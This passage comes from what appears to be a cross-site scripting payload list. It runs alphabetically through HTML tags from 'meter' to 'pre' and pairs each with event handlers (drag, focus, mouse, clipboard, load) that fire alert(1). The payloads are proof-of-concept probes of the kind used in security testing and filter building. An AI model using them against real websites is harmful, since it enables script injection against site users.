ondragstart="alert(1)">test</meter> +<meter id=x tabindex=1 
onactivate=alert(1)></meter> +<meter id=x tabindex=1 onbeforeactivate=alert(1)></meter> +<meter id=x tabindex=1 onbeforedeactivate=alert(1)></meter><input autofocus> +<meter id=x tabindex=1 ondeactivate=alert(1)></meter><input id=y autofocus> +<meter id=x tabindex=1 onfocus=alert(1)></meter> +<meter id=x tabindex=1 onfocusin=alert(1)></meter> +<meter onbeforecopy="alert(1)" contenteditable>test</meter> +<meter onbeforecut="alert(1)" contenteditable>test</meter> +<meter onbeforepaste="alert(1)" contenteditable>test</meter> +<meter onblur=alert(1) tabindex=1 id=x></meter><input autofocus> +<meter onclick="alert(1)">test</meter> +<meter oncontextmenu="alert(1)">test</meter> +<meter oncopy="alert(1)" contenteditable>test</meter> +<meter oncut="alert(1)" contenteditable>test</meter> +<meter ondblclick="alert(1)">test</meter> +<meter onfocusout=alert(1) tabindex=1 id=x></meter><input autofocus> +<meter onkeydown="alert(1)" contenteditable>test</meter> +<meter onkeypress="alert(1)" contenteditable>test</meter> +<meter onkeyup="alert(1)" contenteditable>test</meter> +<meter onmousedown="alert(1)">test</meter> +<meter onmouseenter="alert(1)">test</meter> +<meter onmouseleave="alert(1)">test</meter> +<meter onmousemove="alert(1)">test</meter> +<meter onmouseout="alert(1)">test</meter> +<meter onmouseover="alert(1)">test</meter> +<meter onmouseup="alert(1)">test</meter> +<meter onpaste="alert(1)" contenteditable>test</meter> +<multicol draggable="true" ondrag="alert(1)">test</multicol> +<multicol draggable="true" ondragend="alert(1)">test</multicol> +<multicol draggable="true" ondragenter="alert(1)">test</multicol> +<multicol draggable="true" ondragleave="alert(1)">test</multicol> +<multicol draggable="true" ondragstart="alert(1)">test</multicol> +<multicol id=x tabindex=1 onactivate=alert(1)></multicol> +<multicol id=x tabindex=1 onbeforeactivate=alert(1)></multicol> +<multicol id=x tabindex=1 onbeforedeactivate=alert(1)></multicol><input autofocus> +<multicol id=x 
tabindex=1 ondeactivate=alert(1)></multicol><input id=y autofocus> +<multicol id=x tabindex=1 onfocus=alert(1)></multicol> +<multicol id=x tabindex=1 onfocusin=alert(1)></multicol> +<multicol onbeforecopy="alert(1)" contenteditable>test</multicol> +<multicol onbeforecut="alert(1)" contenteditable>test</multicol> +<multicol onbeforepaste="alert(1)" contenteditable>test</multicol> +<multicol onblur=alert(1) tabindex=1 id=x></multicol><input autofocus> +<multicol onclick="alert(1)">test</multicol> +<multicol oncontextmenu="alert(1)">test</multicol> +<multicol oncopy="alert(1)" contenteditable>test</multicol> +<multicol oncut="alert(1)" contenteditable>test</multicol> +<multicol ondblclick="alert(1)">test</multicol> +<multicol onfocusout=alert(1) tabindex=1 id=x></multicol><input autofocus> +<multicol onkeydown="alert(1)" contenteditable>test</multicol> +<multicol onkeypress="alert(1)" contenteditable>test</multicol> +<multicol onkeyup="alert(1)" contenteditable>test</multicol> +<multicol onmousedown="alert(1)">test</multicol> +<multicol onmouseenter="alert(1)">test</multicol> +<multicol onmouseleave="alert(1)">test</multicol> +<multicol onmousemove="alert(1)">test</multicol> +<multicol onmouseout="alert(1)">test</multicol> +<multicol onmouseover="alert(1)">test</multicol> +<multicol onmouseup="alert(1)">test</multicol> +<multicol onpaste="alert(1)" contenteditable>test</multicol> +<nav draggable="true" ondrag="alert(1)">test</nav> +<nav draggable="true" ondragend="alert(1)">test</nav> +<nav draggable="true" ondragenter="alert(1)">test</nav> +<nav draggable="true" ondragleave="alert(1)">test</nav> +<nav draggable="true" ondragstart="alert(1)">test</nav> +<nav id=x tabindex=1 onactivate=alert(1)></nav> +<nav id=x tabindex=1 onbeforeactivate=alert(1)></nav> +<nav id=x tabindex=1 onbeforedeactivate=alert(1)></nav><input autofocus> +<nav id=x tabindex=1 ondeactivate=alert(1)></nav><input id=y autofocus> +<nav id=x tabindex=1 onfocus=alert(1)></nav> +<nav id=x tabindex=1 
onfocusin=alert(1)></nav> +<nav onbeforecopy="alert(1)" contenteditable>test</nav> +<nav onbeforecut="alert(1)" contenteditable>test</nav> +<nav onbeforepaste="alert(1)" contenteditable>test</nav> +<nav onblur=alert(1) tabindex=1 id=x></nav><input autofocus> +<nav onclick="alert(1)">test</nav> +<nav oncontextmenu="alert(1)">test</nav> +<nav oncopy="alert(1)" contenteditable>test</nav> +<nav oncut="alert(1)" contenteditable>test</nav> +<nav ondblclick="alert(1)">test</nav> +<nav onfocusout=alert(1) tabindex=1 id=x></nav><input autofocus> +<nav onkeydown="alert(1)" contenteditable>test</nav> +<nav onkeypress="alert(1)" contenteditable>test</nav> +<nav onkeyup="alert(1)" contenteditable>test</nav> +<nav onmousedown="alert(1)">test</nav> +<nav onmouseenter="alert(1)">test</nav> +<nav onmouseleave="alert(1)">test</nav> +<nav onmousemove="alert(1)">test</nav> +<nav onmouseout="alert(1)">test</nav> +<nav onmouseover="alert(1)">test</nav> +<nav onmouseup="alert(1)">test</nav> +<nav onpaste="alert(1)" contenteditable>test</nav> +<nextid draggable="true" ondrag="alert(1)">test</nextid> +<nextid draggable="true" ondragend="alert(1)">test</nextid> +<nextid draggable="true" ondragenter="alert(1)">test</nextid> +<nextid draggable="true" ondragleave="alert(1)">test</nextid> +<nextid draggable="true" ondragstart="alert(1)">test</nextid> +<nextid id=x tabindex=1 onactivate=alert(1)></nextid> +<nextid id=x tabindex=1 onbeforeactivate=alert(1)></nextid> +<nextid id=x tabindex=1 onbeforedeactivate=alert(1)></nextid><input autofocus> +<nextid id=x tabindex=1 ondeactivate=alert(1)></nextid><input id=y autofocus> +<nextid id=x tabindex=1 onfocus=alert(1)></nextid> +<nextid id=x tabindex=1 onfocusin=alert(1)></nextid> +<nextid onbeforecopy="alert(1)" contenteditable>test</nextid> +<nextid onbeforecut="alert(1)" contenteditable>test</nextid> +<nextid onbeforepaste="alert(1)" contenteditable>test</nextid> +<nextid onblur=alert(1) tabindex=1 id=x></nextid><input autofocus> +<nextid 
onclick="alert(1)">test</nextid> +<nextid oncontextmenu="alert(1)">test</nextid> +<nextid oncopy="alert(1)" contenteditable>test</nextid> +<nextid oncut="alert(1)" contenteditable>test</nextid> +<nextid ondblclick="alert(1)">test</nextid> +<nextid onfocusout=alert(1) tabindex=1 id=x></nextid><input autofocus> +<nextid onkeydown="alert(1)" contenteditable>test</nextid> +<nextid onkeypress="alert(1)" contenteditable>test</nextid> +<nextid onkeyup="alert(1)" contenteditable>test</nextid> +<nextid onmousedown="alert(1)">test</nextid> +<nextid onmouseenter="alert(1)">test</nextid> +<nextid onmouseleave="alert(1)">test</nextid> +<nextid onmousemove="alert(1)">test</nextid> +<nextid onmouseout="alert(1)">test</nextid> +<nextid onmouseover="alert(1)">test</nextid> +<nextid onmouseup="alert(1)">test</nextid> +<nextid onpaste="alert(1)" contenteditable>test</nextid> +<nobr draggable="true" ondrag="alert(1)">test</nobr> +<nobr draggable="true" ondragend="alert(1)">test</nobr> +<nobr draggable="true" ondragenter="alert(1)">test</nobr> +<nobr draggable="true" ondragleave="alert(1)">test</nobr> +<nobr draggable="true" ondragstart="alert(1)">test</nobr> +<nobr id=x tabindex=1 onactivate=alert(1)></nobr> +<nobr id=x tabindex=1 onbeforeactivate=alert(1)></nobr> +<nobr id=x tabindex=1 onbeforedeactivate=alert(1)></nobr><input autofocus> +<nobr id=x tabindex=1 ondeactivate=alert(1)></nobr><input id=y autofocus> +<nobr id=x tabindex=1 onfocus=alert(1)></nobr> +<nobr id=x tabindex=1 onfocusin=alert(1)></nobr> +<nobr onbeforecopy="alert(1)" contenteditable>test</nobr> +<nobr onbeforecut="alert(1)" contenteditable>test</nobr> +<nobr onbeforepaste="alert(1)" contenteditable>test</nobr> +<nobr onblur=alert(1) tabindex=1 id=x></nobr><input autofocus> +<nobr onclick="alert(1)">test</nobr> +<nobr oncontextmenu="alert(1)">test</nobr> +<nobr oncopy="alert(1)" contenteditable>test</nobr> +<nobr oncut="alert(1)" contenteditable>test</nobr> +<nobr ondblclick="alert(1)">test</nobr> +<nobr 
onfocusout=alert(1) tabindex=1 id=x></nobr><input autofocus> +<nobr onkeydown="alert(1)" contenteditable>test</nobr> +<nobr onkeypress="alert(1)" contenteditable>test</nobr> +<nobr onkeyup="alert(1)" contenteditable>test</nobr> +<nobr onmousedown="alert(1)">test</nobr> +<nobr onmouseenter="alert(1)">test</nobr> +<nobr onmouseleave="alert(1)">test</nobr> +<nobr onmousemove="alert(1)">test</nobr> +<nobr onmouseout="alert(1)">test</nobr> +<nobr onmouseover="alert(1)">test</nobr> +<nobr onmouseup="alert(1)">test</nobr> +<nobr onpaste="alert(1)" contenteditable>test</nobr> +<noembed draggable="true" ondrag="alert(1)">test</noembed> +<noembed draggable="true" ondragend="alert(1)">test</noembed> +<noembed draggable="true" ondragenter="alert(1)">test</noembed> +<noembed draggable="true" ondragleave="alert(1)">test</noembed> +<noembed draggable="true" ondragstart="alert(1)">test</noembed> +<noembed id=x tabindex=1 onactivate=alert(1)></noembed> +<noembed id=x tabindex=1 onbeforeactivate=alert(1)></noembed> +<noembed id=x tabindex=1 onbeforedeactivate=alert(1)></noembed><input autofocus> +<noembed id=x tabindex=1 ondeactivate=alert(1)></noembed><input id=y autofocus> +<noembed id=x tabindex=1 onfocus=alert(1)></noembed> +<noembed id=x tabindex=1 onfocusin=alert(1)></noembed> +<noembed onbeforecopy="alert(1)" contenteditable>test</noembed> +<noembed onbeforecut="alert(1)" contenteditable>test</noembed> +<noembed onbeforepaste="alert(1)" contenteditable>test</noembed> +<noembed onblur=alert(1) tabindex=1 id=x></noembed><input autofocus> +<noembed onclick="alert(1)">test</noembed> +<noembed oncontextmenu="alert(1)">test</noembed> +<noembed oncopy="alert(1)" contenteditable>test</noembed> +<noembed oncut="alert(1)" contenteditable>test</noembed> +<noembed ondblclick="alert(1)">test</noembed> +<noembed onfocusout=alert(1) tabindex=1 id=x></noembed><input autofocus> +<noembed onkeydown="alert(1)" contenteditable>test</noembed> +<noembed onkeypress="alert(1)" 
contenteditable>test</noembed> +<noembed onkeyup="alert(1)" contenteditable>test</noembed> +<noembed onmousedown="alert(1)">test</noembed> +<noembed onmouseenter="alert(1)">test</noembed> +<noembed onmouseleave="alert(1)">test</noembed> +<noembed onmousemove="alert(1)">test</noembed> +<noembed onmouseout="alert(1)">test</noembed> +<noembed onmouseover="alert(1)">test</noembed> +<noembed onmouseup="alert(1)">test</noembed> +<noembed onpaste="alert(1)" contenteditable>test</noembed> +<noframes draggable="true" ondrag="alert(1)">test</noframes> +<noframes draggable="true" ondragend="alert(1)">test</noframes> +<noframes draggable="true" ondragenter="alert(1)">test</noframes> +<noframes draggable="true" ondragleave="alert(1)">test</noframes> +<noframes draggable="true" ondragstart="alert(1)">test</noframes> +<noframes id=x tabindex=1 onactivate=alert(1)></noframes> +<noframes id=x tabindex=1 onbeforeactivate=alert(1)></noframes> +<noframes id=x tabindex=1 onbeforedeactivate=alert(1)></noframes><input autofocus> +<noframes id=x tabindex=1 ondeactivate=alert(1)></noframes><input id=y autofocus> +<noframes id=x tabindex=1 onfocus=alert(1)></noframes> +<noframes id=x tabindex=1 onfocusin=alert(1)></noframes> +<noframes onbeforecopy="alert(1)" contenteditable>test</noframes> +<noframes onbeforecut="alert(1)" contenteditable>test</noframes> +<noframes onbeforepaste="alert(1)" contenteditable>test</noframes> +<noframes onblur=alert(1) tabindex=1 id=x></noframes><input autofocus> +<noframes onclick="alert(1)">test</noframes> +<noframes oncontextmenu="alert(1)">test</noframes> +<noframes oncopy="alert(1)" contenteditable>test</noframes> +<noframes oncut="alert(1)" contenteditable>test</noframes> +<noframes ondblclick="alert(1)">test</noframes> +<noframes onfocusout=alert(1) tabindex=1 id=x></noframes><input autofocus> +<noframes onkeydown="alert(1)" contenteditable>test</noframes> +<noframes onkeypress="alert(1)" contenteditable>test</noframes> +<noframes onkeyup="alert(1)" 
contenteditable>test</noframes> +<noframes onmousedown="alert(1)">test</noframes> +<noframes onmouseenter="alert(1)">test</noframes> +<noframes onmouseleave="alert(1)">test</noframes> +<noframes onmousemove="alert(1)">test</noframes> +<noframes onmouseout="alert(1)">test</noframes> +<noframes onmouseover="alert(1)">test</noframes> +<noframes onmouseup="alert(1)">test</noframes> +<noframes onpaste="alert(1)" contenteditable>test</noframes> +<noscript draggable="true" ondrag="alert(1)">test</noscript> +<noscript draggable="true" ondragend="alert(1)">test</noscript> +<noscript draggable="true" ondragenter="alert(1)">test</noscript> +<noscript draggable="true" ondragleave="alert(1)">test</noscript> +<noscript draggable="true" ondragstart="alert(1)">test</noscript> +<noscript id=x tabindex=1 onactivate=alert(1)></noscript> +<noscript id=x tabindex=1 onbeforeactivate=alert(1)></noscript> +<noscript id=x tabindex=1 onbeforedeactivate=alert(1)></noscript><input autofocus> +<noscript id=x tabindex=1 ondeactivate=alert(1)></noscript><input id=y autofocus> +<noscript id=x tabindex=1 onfocus=alert(1)></noscript> +<noscript id=x tabindex=1 onfocusin=alert(1)></noscript> +<noscript onbeforecopy="alert(1)" contenteditable>test</noscript> +<noscript onbeforecut="alert(1)" contenteditable>test</noscript> +<noscript onbeforepaste="alert(1)" contenteditable>test</noscript> +<noscript onblur=alert(1) tabindex=1 id=x></noscript><input autofocus> +<noscript onclick="alert(1)">test</noscript> +<noscript oncontextmenu="alert(1)">test</noscript> +<noscript oncopy="alert(1)" contenteditable>test</noscript> +<noscript oncut="alert(1)" contenteditable>test</noscript> +<noscript ondblclick="alert(1)">test</noscript> +<noscript onfocusout=alert(1) tabindex=1 id=x></noscript><input autofocus> +<noscript onkeydown="alert(1)" contenteditable>test</noscript> +<noscript onkeypress="alert(1)" contenteditable>test</noscript> +<noscript onkeyup="alert(1)" contenteditable>test</noscript> +<noscript 
onmousedown="alert(1)">test</noscript> +<noscript onmouseenter="alert(1)">test</noscript> +<noscript onmouseleave="alert(1)">test</noscript> +<noscript onmousemove="alert(1)">test</noscript> +<noscript onmouseout="alert(1)">test</noscript> +<noscript onmouseover="alert(1)">test</noscript> +<noscript onmouseup="alert(1)">test</noscript> +<noscript onpaste="alert(1)" contenteditable>test</noscript> +<object data=/ onload=alert(1)> +<object data=/ onreadystatechange=alert(1)> +<object draggable="true" ondrag="alert(1)">test</object> +<object draggable="true" ondragend="alert(1)">test</object> +<object draggable="true" ondragenter="alert(1)">test</object> +<object draggable="true" ondragleave="alert(1)">test</object> +<object draggable="true" ondragstart="alert(1)">test</object> +<object id=x onfocus=alert(1) type=text/html> +<object id=x onfocusin=alert(1) type=text/html> +<object id=x tabindex=1 onactivate=alert(1)></object> +<object id=x tabindex=1 onbeforeactivate=alert(1)></object> +<object id=x tabindex=1 onbeforedeactivate=alert(1)></object><input autofocus> +<object id=x tabindex=1 ondeactivate=alert(1)></object><input id=y autofocus> +<object onbeforecopy="alert(1)" contenteditable>test</object> +<object onbeforecut="alert(1)" contenteditable>test</object> +<object onbeforepaste="alert(1)" contenteditable>test</object> +<object onblur=alert(1) tabindex=1 id=x></object><input autofocus> +<object onclick="alert(1)">test</object> +<object oncontextmenu="alert(1)">test</object> +<object oncopy="alert(1)" contenteditable>test</object> +<object oncut="alert(1)" contenteditable>test</object> +<object ondblclick="alert(1)">test</object> +<object onerror=alert(1) data=1 type=image/gif> +<object onfocusout=alert(1) tabindex=1 id=x></object><input autofocus> +<object onkeydown="alert(1)" contenteditable>test</object> +<object onkeypress="alert(1)" contenteditable>test</object> +<object onkeyup="alert(1)" contenteditable>test</object> +<object 
onmousedown="alert(1)">test</object> +<object onmouseenter="alert(1)">test</object> +<object onmouseleave="alert(1)">test</object> +<object onmousemove="alert(1)">test</object> +<object onmouseout="alert(1)">test</object> +<object onmouseover="alert(1)">test</object> +<object onmouseup="alert(1)">test</object> +<object onpaste="alert(1)" contenteditable>test</object> +<ol draggable="true" ondrag="alert(1)">test</ol> +<ol draggable="true" ondragend="alert(1)">test</ol> +<ol draggable="true" ondragenter="alert(1)">test</ol> +<ol draggable="true" ondragleave="alert(1)">test</ol> +<ol draggable="true" ondragstart="alert(1)">test</ol> +<ol id=x tabindex=1 onactivate=alert(1)></ol> +<ol id=x tabindex=1 onbeforeactivate=alert(1)></ol> +<ol id=x tabindex=1 onbeforedeactivate=alert(1)></ol><input autofocus> +<ol id=x tabindex=1 ondeactivate=alert(1)></ol><input id=y autofocus> +<ol id=x tabindex=1 onfocus=alert(1)></ol> +<ol id=x tabindex=1 onfocusin=alert(1)></ol> +<ol onbeforecopy="alert(1)" contenteditable>test</ol> +<ol onbeforecut="alert(1)" contenteditable>test</ol> +<ol onbeforepaste="alert(1)" contenteditable>test</ol> +<ol onblur=alert(1) tabindex=1 id=x></ol><input autofocus> +<ol onclick="alert(1)">test</ol> +<ol oncontextmenu="alert(1)">test</ol> +<ol oncopy="alert(1)" contenteditable>test</ol> +<ol oncut="alert(1)" contenteditable>test</ol> +<ol ondblclick="alert(1)">test</ol> +<ol onfocusout=alert(1) tabindex=1 id=x></ol><input autofocus> +<ol onkeydown="alert(1)" contenteditable>test</ol> +<ol onkeypress="alert(1)" contenteditable>test</ol> +<ol onkeyup="alert(1)" contenteditable>test</ol> +<ol onmousedown="alert(1)">test</ol> +<ol onmouseenter="alert(1)">test</ol> +<ol onmouseleave="alert(1)">test</ol> +<ol onmousemove="alert(1)">test</ol> +<ol onmouseout="alert(1)">test</ol> +<ol onmouseover="alert(1)">test</ol> +<ol onmouseup="alert(1)">test</ol> +<ol onpaste="alert(1)" contenteditable>test</ol> +<optgroup draggable="true" ondrag="alert(1)">test</optgroup> 
+<optgroup draggable="true" ondragend="alert(1)">test</optgroup> +<optgroup draggable="true" ondragenter="alert(1)">test</optgroup> +<optgroup draggable="true" ondragleave="alert(1)">test</optgroup> +<optgroup draggable="true" ondragstart="alert(1)">test</optgroup> +<optgroup id=x tabindex=1 onactivate=alert(1)></optgroup> +<optgroup id=x tabindex=1 onbeforeactivate=alert(1)></optgroup> +<optgroup id=x tabindex=1 onbeforedeactivate=alert(1)></optgroup><input autofocus> +<optgroup id=x tabindex=1 ondeactivate=alert(1)></optgroup><input id=y autofocus> +<optgroup id=x tabindex=1 onfocus=alert(1)></optgroup> +<optgroup id=x tabindex=1 onfocusin=alert(1)></optgroup> +<optgroup onbeforecopy="alert(1)" contenteditable>test</optgroup> +<optgroup onbeforecut="alert(1)" contenteditable>test</optgroup> +<optgroup onbeforepaste="alert(1)" contenteditable>test</optgroup> +<optgroup onblur=alert(1) tabindex=1 id=x></optgroup><input autofocus> +<optgroup onclick="alert(1)">test</optgroup> +<optgroup oncontextmenu="alert(1)">test</optgroup> +<optgroup oncopy="alert(1)" contenteditable>test</optgroup> +<optgroup oncut="alert(1)" contenteditable>test</optgroup> +<optgroup ondblclick="alert(1)">test</optgroup> +<optgroup onfocusout=alert(1) tabindex=1 id=x></optgroup><input autofocus> +<optgroup onkeydown="alert(1)" contenteditable>test</optgroup> +<optgroup onkeypress="alert(1)" contenteditable>test</optgroup> +<optgroup onkeyup="alert(1)" contenteditable>test</optgroup> +<optgroup onmousedown="alert(1)">test</optgroup> +<optgroup onmouseenter="alert(1)">test</optgroup> +<optgroup onmouseleave="alert(1)">test</optgroup> +<optgroup onmousemove="alert(1)">test</optgroup> +<optgroup onmouseout="alert(1)">test</optgroup> +<optgroup onmouseover="alert(1)">test</optgroup> +<optgroup onmouseup="alert(1)">test</optgroup> +<optgroup onpaste="alert(1)" contenteditable>test</optgroup> +<option draggable="true" ondrag="alert(1)">test</option> +<option draggable="true" 
ondragend="alert(1)">test</option> +<option draggable="true" ondragenter="alert(1)">test</option> +<option draggable="true" ondragleave="alert(1)">test</option> +<option draggable="true" ondragstart="alert(1)">test</option> +<option id=x tabindex=1 onactivate=alert(1)></option> +<option id=x tabindex=1 onbeforeactivate=alert(1)></option> +<option id=x tabindex=1 onbeforedeactivate=alert(1)></option><input autofocus> +<option id=x tabindex=1 ondeactivate=alert(1)></option><input id=y autofocus> +<option id=x tabindex=1 onfocus=alert(1)></option> +<option id=x tabindex=1 onfocusin=alert(1)></option> +<option onbeforecopy="alert(1)" contenteditable>test</option> +<option onbeforecut="alert(1)" contenteditable>test</option> +<option onbeforepaste="alert(1)" contenteditable>test</option> +<option onblur=alert(1) tabindex=1 id=x></option><input autofocus> +<option onclick="alert(1)">test</option> +<option oncontextmenu="alert(1)">test</option> +<option oncopy="alert(1)" contenteditable>test</option> +<option oncut="alert(1)" contenteditable>test</option> +<option ondblclick="alert(1)">test</option> +<option onfocusout=alert(1) tabindex=1 id=x></option><input autofocus> +<option onkeydown="alert(1)" contenteditable>test</option> +<option onkeypress="alert(1)" contenteditable>test</option> +<option onkeyup="alert(1)" contenteditable>test</option> +<option onmousedown="alert(1)">test</option> +<option onmouseenter="alert(1)">test</option> +<option onmouseleave="alert(1)">test</option> +<option onmousemove="alert(1)">test</option> +<option onmouseout="alert(1)">test</option> +<option onmouseover="alert(1)">test</option> +<option onmouseup="alert(1)">test</option> +<option onpaste="alert(1)" contenteditable>test</option> +<output draggable="true" ondrag="alert(1)">test</output> +<output draggable="true" ondragend="alert(1)">test</output> +<output draggable="true" ondragenter="alert(1)">test</output> +<output draggable="true" ondragleave="alert(1)">test</output> +<output 
draggable="true" ondragstart="alert(1)">test</output> +<output id=x tabindex=1 onactivate=alert(1)></output> +<output id=x tabindex=1 onbeforeactivate=alert(1)></output> +<output id=x tabindex=1 onbeforedeactivate=alert(1)></output><input autofocus> +<output id=x tabindex=1 ondeactivate=alert(1)></output><input id=y autofocus> +<output id=x tabindex=1 onfocus=alert(1)></output> +<output id=x tabindex=1 onfocusin=alert(1)></output> +<output onbeforecopy="alert(1)" contenteditable>test</output> +<output onbeforecut="alert(1)" contenteditable>test</output> +<output onbeforepaste="alert(1)" contenteditable>test</output> +<output onblur=alert(1) tabindex=1 id=x></output><input autofocus> +<output onclick="alert(1)">test</output> +<output oncontextmenu="alert(1)">test</output> +<output oncopy="alert(1)" contenteditable>test</output> +<output oncut="alert(1)" contenteditable>test</output> +<output ondblclick="alert(1)">test</output> +<output onfocusout=alert(1) tabindex=1 id=x></output><input autofocus> +<output onkeydown="alert(1)" contenteditable>test</output> +<output onkeypress="alert(1)" contenteditable>test</output> +<output onkeyup="alert(1)" contenteditable>test</output> +<output onmousedown="alert(1)">test</output> +<output onmouseenter="alert(1)">test</output> +<output onmouseleave="alert(1)">test</output> +<output onmousemove="alert(1)">test</output> +<output onmouseout="alert(1)">test</output> +<output onmouseover="alert(1)">test</output> +<output onmouseup="alert(1)">test</output> +<output onpaste="alert(1)" contenteditable>test</output> +<p draggable="true" ondrag="alert(1)">test</p> +<p draggable="true" ondragend="alert(1)">test</p> +<p draggable="true" ondragenter="alert(1)">test</p> +<p draggable="true" ondragleave="alert(1)">test</p> +<p draggable="true" ondragstart="alert(1)">test</p> +<p id=x tabindex=1 onactivate=alert(1)></p> +<p id=x tabindex=1 onbeforeactivate=alert(1)></p> +<p id=x tabindex=1 onbeforedeactivate=alert(1)></p><input autofocus> +<p 
id=x tabindex=1 ondeactivate=alert(1)></p><input id=y autofocus> +<p id=x tabindex=1 onfocus=alert(1)></p> +<p id=x tabindex=1 onfocusin=alert(1)></p> +<p onbeforecopy="alert(1)" contenteditable>test</p> +<p onbeforecut="alert(1)" contenteditable>test</p> +<p onbeforepaste="alert(1)" contenteditable>test</p> +<p onblur=alert(1) tabindex=1 id=x></p><input autofocus> +<p onclick="alert(1)">test</p> +<p oncontextmenu="alert(1)">test</p> +<p oncopy="alert(1)" contenteditable>test</p> +<p oncut="alert(1)" contenteditable>test</p> +<p ondblclick="alert(1)">test</p> +<p onfocusout=alert(1) tabindex=1 id=x></p><input autofocus> +<p onkeydown="alert(1)" contenteditable>test</p> +<p onkeypress="alert(1)" contenteditable>test</p> +<p onkeyup="alert(1)" contenteditable>test</p> +<p onmousedown="alert(1)">test</p> +<p onmouseenter="alert(1)">test</p> +<p onmouseleave="alert(1)">test</p> +<p onmousemove="alert(1)">test</p> +<p onmouseout="alert(1)">test</p> +<p onmouseover="alert(1)">test</p> +<p onmouseup="alert(1)">test</p> +<p onpaste="alert(1)" contenteditable>test</p> +<param draggable="true" ondrag="alert(1)">test</param> +<param draggable="true" ondragend="alert(1)">test</param> +<param draggable="true" ondragenter="alert(1)">test</param> +<param draggable="true" ondragleave="alert(1)">test</param> +<param draggable="true" ondragstart="alert(1)">test</param> +<param id=x tabindex=1 onactivate=alert(1)></param> +<param id=x tabindex=1 onbeforeactivate=alert(1)></param> +<param id=x tabindex=1 onbeforedeactivate=alert(1)></param><input autofocus> +<param id=x tabindex=1 ondeactivate=alert(1)></param><input id=y autofocus> +<param id=x tabindex=1 onfocus=alert(1)></param> +<param id=x tabindex=1 onfocusin=alert(1)></param> +<param onbeforecopy="alert(1)" contenteditable>test</param> +<param onbeforecut="alert(1)" contenteditable>test</param> +<param onbeforepaste="alert(1)" contenteditable>test</param> +<param onblur=alert(1) tabindex=1 id=x></param><input autofocus> +<param 
onclick="alert(1)">test</param> +<param oncontextmenu="alert(1)">test</param> +<param oncopy="alert(1)" contenteditable>test</param> +<param oncut="alert(1)" contenteditable>test</param> +<param ondblclick="alert(1)">test</param> +<param onfocusout=alert(1) tabindex=1 id=x></param><input autofocus> +<param onkeydown="alert(1)" contenteditable>test</param> +<param onkeypress="alert(1)" contenteditable>test</param> +<param onkeyup="alert(1)" contenteditable>test</param> +<param onmousedown="alert(1)">test</param> +<param onmouseenter="alert(1)">test</param> +<param onmouseleave="alert(1)">test</param> +<param onmousemove="alert(1)">test</param> +<param onmouseout="alert(1)">test</param> +<param onmouseover="alert(1)">test</param> +<param onmouseup="alert(1)">test</param> +<param onpaste="alert(1)" contenteditable>test</param> +<picture draggable="true" ondrag="alert(1)">test</picture> +<picture draggable="true" ondragend="alert(1)">test</picture> +<picture draggable="true" ondragenter="alert(1)">test</picture> +<picture draggable="true" ondragleave="alert(1)">test</picture> +<picture draggable="true" ondragstart="alert(1)">test</picture> +<picture id=x tabindex=1 onactivate=alert(1)></picture> +<picture id=x tabindex=1 onbeforeactivate=alert(1)></picture> +<picture id=x tabindex=1 onbeforedeactivate=alert(1)></picture><input autofocus> +<picture id=x tabindex=1 ondeactivate=alert(1)></picture><input id=y autofocus> +<picture id=x tabindex=1 onfocus=alert(1)></picture> +<picture id=x tabindex=1 onfocusin=alert(1)></picture> +<picture onbeforecopy="alert(1)" contenteditable>test</picture> +<picture onbeforecut="alert(1)" contenteditable>test</picture> +<picture onbeforepaste="alert(1)" contenteditable>test</picture> +<picture onblur=alert(1) tabindex=1 id=x></picture><input autofocus> +<picture onclick="alert(1)">test</picture> +<picture oncontextmenu="alert(1)">test</picture> +<picture oncopy="alert(1)" contenteditable>test</picture> +<picture oncut="alert(1)" 
contenteditable>test</picture> +<picture ondblclick="alert(1)">test</picture> +<picture onfocusout=alert(1) tabindex=1 id=x></picture><input autofocus> +<picture onkeydown="alert(1)" contenteditable>test</picture> +<picture onkeypress="alert(1)" contenteditable>test</picture> +<picture onkeyup="alert(1)" contenteditable>test</picture> +<picture onmousedown="alert(1)">test</picture> +<picture onmouseenter="alert(1)">test</picture> +<picture onmouseleave="alert(1)">test</picture> +<picture onmousemove="alert(1)">test</picture> +<picture onmouseout="alert(1)">test</picture> +<picture onmouseover="alert(1)">test</picture> +<picture onmouseup="alert(1)">test</picture> +<picture onpaste="alert(1)" contenteditable>test</picture> +<picture><source srcset="validimage.png"><image onload=alert(1)></picture> +<picture><source srcset="validimage.png"><image onloadend=alert(1)></picture> +<picture><source srcset="validimage.png"><image onloadstart=alert(1)></picture> +<picture><source srcset="validimage.png"><img onload=alert(1)></picture> +<picture><source srcset="validimage.png"><img onloadend=alert(1)></picture> +<picture><source srcset="validimage.png"><img onloadstart=alert(1)></picture> +<plaintext draggable="true" ondrag="alert(1)">test</plaintext> +<plaintext draggable="true" ondragend="alert(1)">test</plaintext> +<plaintext draggable="true" ondragenter="alert(1)">test</plaintext> +<plaintext draggable="true" ondragleave="alert(1)">test</plaintext> +<plaintext draggable="true" ondragstart="alert(1)">test</plaintext> +<plaintext id=x tabindex=1 onactivate=alert(1)></plaintext> +<plaintext id=x tabindex=1 onbeforeactivate=alert(1)></plaintext> +<plaintext id=x tabindex=1 onbeforedeactivate=alert(1)></plaintext><input autofocus> +<plaintext id=x tabindex=1 ondeactivate=alert(1)></plaintext><input id=y autofocus> +<plaintext id=x tabindex=1 onfocus=alert(1)></plaintext> +<plaintext id=x tabindex=1 onfocusin=alert(1)></plaintext> +<plaintext onbeforecopy="alert(1)" 
contenteditable>test</plaintext> +<plaintext onbeforecut="alert(1)" contenteditable>test</plaintext> +<plaintext onbeforepaste="alert(1)" contenteditable>test</plaintext> +<plaintext onblur=alert(1) tabindex=1 id=x></plaintext><input autofocus> +<plaintext onclick="alert(1)">test</plaintext> +<plaintext oncontextmenu="alert(1)">test</plaintext> +<plaintext oncopy="alert(1)" contenteditable>test</plaintext> +<plaintext oncut="alert(1)" contenteditable>test</plaintext> +<plaintext ondblclick="alert(1)">test</plaintext> +<plaintext onfocusout=alert(1) tabindex=1 id=x></plaintext><input autofocus> +<plaintext onkeydown="alert(1)" contenteditable>test</plaintext> +<plaintext onkeypress="alert(1)" contenteditable>test</plaintext> +<plaintext onkeyup="alert(1)" contenteditable>test</plaintext> +<plaintext onmousedown="alert(1)">test</plaintext> +<plaintext onmouseenter="alert(1)">test</plaintext> +<plaintext onmouseleave="alert(1)">test</plaintext> +<plaintext onmousemove="alert(1)">test</plaintext> +<plaintext onmouseout="alert(1)">test</plaintext> +<plaintext onmouseover="alert(1)">test</plaintext> +<plaintext onmouseup="alert(1)">test</plaintext> +<plaintext onpaste="alert(1)" contenteditable>test</plaintext> +<pre draggable="true" ondrag="alert(1)">test</pre> +<pre draggable="true" 